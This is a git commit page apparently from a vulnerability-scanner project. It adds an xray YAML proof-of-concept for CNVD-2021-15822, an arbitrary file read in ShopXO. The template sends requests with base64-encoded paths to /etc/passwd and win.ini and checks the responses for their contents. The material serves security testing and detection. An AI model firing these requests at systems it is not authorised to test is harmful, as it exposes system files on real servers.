优化xray解析模块,支持groups、新增poc

This commit is contained in:
影舞者
2021-11-16 14:42:35 +08:00
parent 858c28724b
commit b06d7ac94c
313 changed files with 4314 additions and 760 deletions
+19
View File
@@ -0,0 +1,19 @@
name: poc-yaml-shopxo-cnvd-2021-15822
groups:
Linux:
- method: GET
path: /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=
follow_redirects: false
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
Windows:
- method: GET
path: /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ=
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"extensions") && response.body.bcontains(b"for 16-bit app support")
detail:
author: Print1n(http://print1n.top)
description: ShopXO download 任意文件读取
links:
- https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog